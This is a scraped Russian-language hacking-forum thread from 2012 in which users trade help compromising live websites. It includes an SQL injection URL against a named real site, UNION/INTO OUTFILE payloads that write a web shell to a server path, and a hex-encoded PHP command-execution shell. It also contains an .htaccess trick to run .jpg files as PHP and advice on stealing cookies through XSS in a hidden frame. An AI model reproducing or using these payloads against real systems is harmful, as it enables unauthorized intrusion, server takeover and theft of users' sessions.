 |
|
07.04.2012, 03:48
|
|
Познавший АНТИЧАТ
Регистрация: 16.07.2010
Сообщений: 1,022
С нами:
8328566
Репутация:
935
|
|
вопросов на подобии "почему молоко белое, а траву корова ест зеленую?", было предостаточно как и в этой теме, так и в комментариях к одноименным статьям, не ленимся, читаем!
p.s. кстати вопрос "почему молоко белое, а траву корова ест зеленую?", на мой взгляд гораздо интереснее, и не совсем понятно все таки почему.
p.p.s. теперь мне понятно:
Сообщение от None
Все дело в том, что появлением молока корова, как впрочем, и все млекопитающие, обязана внутренним физиологическим процессам, таким как лактация и синтез. Благодаря этим процессам вымя, прежде чем произвести молоко всасывает с крови все необходимые для этого вещества. Одним из таких веществ и является белок казеин, именно благодаря ему молоко становиться белого цвета, точнее тем мелким частицам (мицеллам), которые он образует. К слову сказать, именно казеин является основным составляющим молока, ведь процент его содержания в нем достигает 70-90%, что согласитесь немало.
|
|
|
07.04.2012, 11:28
|
|
Познающий
Регистрация: 02.05.2011
Сообщений: 48
С нами:
7910966
Репутация:
1
|
|
Приветствую, при запросе ( search_result.php?search=1 ') выдаёт
Warning: mysql_fetch_object(): supplied argument is not a valid MySQL result resource in /home/piluli/deploy/releases/20120405144039/public/search_result.php on line 393
стоит ли ковырять дальше ?
|
|
|
|
07.04.2012, 11:41
|
|
Познавший АНТИЧАТ
Регистрация: 16.07.2010
Сообщений: 1,022
С нами:
8328566
Репутация:
935
|
|
нет.
|
|
|
|
08.04.2012, 00:52
|
|
Познающий
Регистрация: 23.08.2010
Сообщений: 45
С нами:
8273846
Репутация:
0
|
|
Вопрос такого плана.
Эта вроде скуля, но не раскручивается никак. или я что то не понимаю. подскажите плиз с раскруткой.
http://bdsmpeople.ru/search/index.php?input_action=search&input_who1=&input_wh o2='&input_bdsm_position=&input_age1=&input_age2=& input_country_id=0&input_state_id=0&input_city_id= 0
параметр input_who2
вот ошибка
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'AND (birthday BETWEEN '19120407' AND '19940407') AND (status='0')' at line 4
|
|
|
|
08.04.2012, 01:18
|
|
Познавший АНТИЧАТ
Регистрация: 12.07.2010
Сообщений: 1,546
С нами:
8334326
Репутация:
75
|
|
У меня маленький вопросец,
залил шел через скулю
открываю его, а мне пишет
Сообщение от None
Forbidden
You don't have permission to access /uploads/shell.php on this server.
хотел создать свой .htaccess с содержимым
Сообщение от None
AddType application/x-httpd-php .jpg
AddHandler application/x-httpd-php .jpg
но мне пишет что етот файл уже существует, можно ли ещо чёнибуть придумать? |
|
|
|
08.04.2012, 11:58
|
|
Участник форума
Регистрация: 08.09.2011
Сообщений: 137
С нами:
7725206
Репутация:
26
|
|
Сообщение от qaz
но мне пишет что етот файл уже существует, можно ли ещо чёнибуть придумать?
хз. если ток искать другую директорию для заливки шелла.
|
|
|
|
08.04.2012, 13:18
|
|
Новичок
Регистрация: 04.11.2004
Сообщений: 5
С нами:
11322426
Репутация:
0
|
|
Сообщение от Pirotexnik
А как слить куки на сниффер без переадресации?
в начале XSS, закрывать обработчик onerror и тег img не нужно.
Для незаметной эксплуатации вставляешь ссылку в скрытый фрейм и размещаешь его на своем сайте:
Внутри фрейма в атрибуте src не забывай заменять двойные кавычки на html-сущности ( ", " или "). Также внутри src не используй urlencode, как в прямой ссылке, пробелы остаются пробелами, плюсы - плюсами.
Сообщение от eclipse
или через AJAX))
Домен сниффера отличается от домена XSS
|
|
|
|
08.04.2012, 20:06
|
|
Познающий
Регистрация: 29.01.2012
Сообщений: 52
С нами:
7519286
Репутация:
-4
|
|
Пытаюсь залить шелл через mysql(f_p =Y).
Мой запрос выглядит так:
Сообщение от None
1'+union+select+1,2,3,4,5,union select user() INTO OUTFILE '/www/domens/dir1/www/banner/mysql.php',7,8,9,10,11,12,13,14,15,16,17,18,19,20, 21,22,23+--+
Вылетает такая ошибка.
Сообщение от None
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'union select user() INTO OUTFILE '/www/domens/dir1/www/banner/mysql.php',' at line 1
|
|
|
|
08.04.2012, 20:12
|
|
Постоянный
Регистрация: 30.08.2010
Сообщений: 327
С нами:
8263766
Репутация:
11
|
|
попробуй этот код за хексить
получится 0x3c3f2073797374656d28245f524551554553545b27636d64 275d293b203f3e
|
|
|
|
08.04.2012, 20:16
|
|
Познающий
Регистрация: 29.01.2012
Сообщений: 52
С нами:
7519286
Репутация:
-4
|
|
Для примера я хотел записать в файл user(), что из этого вышло можешь почитать немного выше...
Разобрался.
Сообщение от None
1%27%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12 ,13,14,15,16,17,18,19,20,21,22,23%20and%28select%2 0%225656%22%20INTO%20OUTFILE%20%22/www/domens/dir1/www/banner/mysql.php%22%29+--+
Так выводит 13 ошибку, а это - ошибка записи. |
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
